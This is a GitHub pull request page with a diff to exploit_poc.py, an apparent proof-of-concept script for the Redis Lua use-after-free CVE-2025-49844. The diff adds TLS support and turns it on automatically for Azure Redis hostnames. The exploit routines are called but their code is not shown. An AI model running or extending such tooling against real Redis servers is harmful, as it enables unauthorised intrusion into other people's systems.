Skip to content

Update exploit_poc.py via SSL auto support #1

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
A1vinSmith wants to merge 1 commit into
base: main
Choose a base branch
from
Open

Update exploit_poc.py via SSL auto support #1

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
29 changes: 17 additions & 12 deletions exploit_poc.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -30,21 +30,21 @@ def banner():
╚═══════════════════════════════════════════════════════════╝{Style.RESET_ALL}
""")

def test_connection(host, port, password=None):
def test_connection(host, port, password=None, use_ssl=False):
"""Test connection to Redis instance"""
try:
print(f"{Fore.YELLOW}[*] Testing connection to {host}:{port}...{Style.RESET_ALL}")
r = redis.Redis(host=host, port=port, password=password, decode_responses=True)
r = redis.Redis(host=host, port=port, password=password, decode_responses=True, ssl=use_ssl)
info = r.info()
print(f"{Fore.GREEN}[+] Connected successfully!{Style.RESET_ALL}")
print(f"{Fore.CYAN}[i] Redis Version: {info.get('redis_version', 'Unknown')}{Style.RESET_ALL}")
return r
except redis.ConnectionError as e:
print(f"{Fore.RED}[-] Connection failed: {e}{Style.RESET_ALL}")
return None
except redis.AuthenticationError:
print(f"{Fore.RED}[-] Authentication failed!{Style.RESET_ALL}")
return None
except redis.ConnectionError as e:
print(f"{Fore.RED}[-] Connection failed: {e}{Style.RESET_ALL}")
return None

def check_lua_enabled(r):
"""Check if Lua scripting is enabled"""
Expand Down Expand Up @@ -235,15 +235,20 @@ def main():
parser.add_argument('-H', '--host', default='localhost', help='Redis host (default: localhost)')
parser.add_argument('-p', '--port', type=int, default=6379, help='Redis port (default: 6379)')
parser.add_argument('-a', '--auth', help='Redis password (if required)')
parser.add_argument('--ssl', action='store_true', help='Connect with SSL/TLS (Azure Redis requires this)')
parser.add_argument('-m', '--mode', choices=['check', 'basic', 'sandbox', 'advanced', 'all'],
default='all', help='Exploit mode (default: all)')

args = parser.parse_args()

banner()

# Connect to Redis
r = test_connection(args.host, args.port, args.auth)
# Auto-enable SSL for Azure hosts (if not explicitly set)
use_ssl = args.ssl
if (not use_ssl and args.host.endswith('.redis.cache.windows.net')):
use_ssl = True
print(f"{Fore.YELLOW}[i] SSL enabled automatically for Azure Redis host{Style.RESET_ALL}")

r = test_connection(args.host, args.port, args.auth, use_ssl)
if not r:
sys.exit(1)

Expand All @@ -260,17 +265,17 @@ def main():
print(f"\n{Fore.CYAN}[i] Check mode only - no exploit attempts{Style.RESET_ALL}")
elif args.mode in ['basic', 'all']:
exploit_uaf_basic(r)

if args.mode in ['sandbox', 'all']:
exploit_sandbox_escape(r)

if args.mode in ['advanced', 'all']:
exploit_memory_corruption(r)

print(f"\n{Fore.CYAN}{'='*60}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] PoC execution completed{Style.RESET_ALL}")
print(f"{Fore.CYAN}{'='*60}{Style.RESET_ALL}")

print(f"\n{Fore.RED}DISCLAIMER:{Style.RESET_ALL}")
print("This PoC is simplified and for educational purposes only.")
print("The actual CVE-2025-49844 exploit involves complex memory manipulation.")
Expand Down